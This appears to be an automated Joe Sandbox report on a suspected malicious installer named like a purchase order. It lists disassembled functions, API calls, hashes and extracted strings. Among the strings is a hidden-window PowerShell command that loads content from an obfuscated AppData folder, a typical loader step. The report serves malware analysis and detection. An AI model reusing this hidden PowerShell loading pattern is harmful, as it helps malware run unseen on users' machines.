Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
Instruction ID: 8da91bbb186c2144be8ade9eda525c6e960391099661206c99069da2b113483a
Opcode Fuzzy Hash: bbff93e8e7b6fbbde5b3e6835961aabe87c2407351212feb15be82645ba7347e
Instruction Fuzzy Hash: 8AC04C717402007BDA209B609E49F0777545790740F1448397241E50E0DA75E450DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00404636 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
Instruction ID: d5eb2a856a333d3101ae379727e71f2b9456d74e3cdd14bb02a2274a242f0d94
Opcode Fuzzy Hash: 7b4bfb7d8a9e2d5081e5309f0fc6290f036d11fbecd93854b33ee848cd02fe6a
Instruction Fuzzy Hash: 7DB09235280640AADE215B00DE09F867B66A7A4701F008438B240640B0CAB204A1DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004035FD Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404623 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004043FA), ref: 0040462D

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
Instruction ID: 1e4f5f38d13ad7c97f33cdc532a4b6885827051f8054e7174c13f2a159251e9b
Opcode Fuzzy Hash: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
Instruction Fuzzy Hash: 7FA00176544900ABCA16AB50EF0980ABB72BBA8701B5288B9A285610348BB25821FB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2

Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54

Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
Opcode Fuzzy Hash: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404AF2 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B41
SetWindowTextW.USER32(00000000,?), ref: 00404B6B
SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
CoTaskMemFree.OLE32(00000000), ref: 00404C27
lstrcmpiW.KERNEL32(: Completed,00422F48,00000000,?,?), ref: 00404C59
lstrcatW.KERNEL32(?,: Completed), ref: 00404C65
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77

Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9

Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
Part of subcall function 00406930: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA

GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55

Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B

Strings

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238, xrefs: 00404C42
A, xrefs: 00404C15
H/B, xrefs: 00404BEF
"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A, xrefs: 00404B0B
: Completed, xrefs: 00404C53, 00404C58, 00404C63

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$: Completed$A$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$H/B
API String ID: 2624150263-3949055606
Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes
API String ID: 542301482-2643801205
Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19

Uniqueness

Uniqueness Score: -1.00%

Function 0040506E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405086
GetDlgItem.USER32(?,00000408), ref: 00405091
GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
SendMessageW.USER32(?,00001109,00000002), ref: 00405147
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
DeleteObject.GDI32(00000000), ref: 00405168
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A

Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
GetWindowLongW.USER32(?,000000F0), ref: 004052AC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
ShowWindow.USER32(?,00000005), ref: 004052CA
SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
ImageList_Destroy.COMCTL32(00000000), ref: 00405498
GlobalFree.KERNEL32(00000000), ref: 004054A8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
ShowWindow.USER32(?,00000000), ref: 00405652
GetDlgItem.USER32(?,000003FE), ref: 0040565D
ShowWindow.USER32(00000000), ref: 00405664

Strings

, xrefs: 0040563C
N, xrefs: 00405303
M, xrefs: 00405222

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18

Uniqueness

Uniqueness Score: -1.00%

Function 004047C0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
GetDlgItem.USER32(?,000003E8), ref: 00404872
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
GetSysColor.USER32(?), ref: 004048A0
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
lstrlenW.KERNEL32(?), ref: 004048C1
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
GetDlgItem.USER32(?,0000040A), ref: 0040493C
SendMessageW.USER32(00000000), ref: 00404943
GetDlgItem.USER32(?,000003E8), ref: 0040496E
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
SetCursor.USER32(00000000), ref: 004049C2
LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
SetCursor.USER32(00000000), ref: 004049DE
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F

Strings

7G@, xrefs: 004049CA
: Completed, xrefs: 0040499D
N, xrefs: 0040495C

Memory Dump Source

Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 7G@$: Completed$N
API String ID: 3103080414-1841378378
Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004062C8 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C

Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119

GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
wsprintfA.USER32 ref: 00406347
GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
GlobalFree.KERNEL32(00000000), ref: 00406430
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437

Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
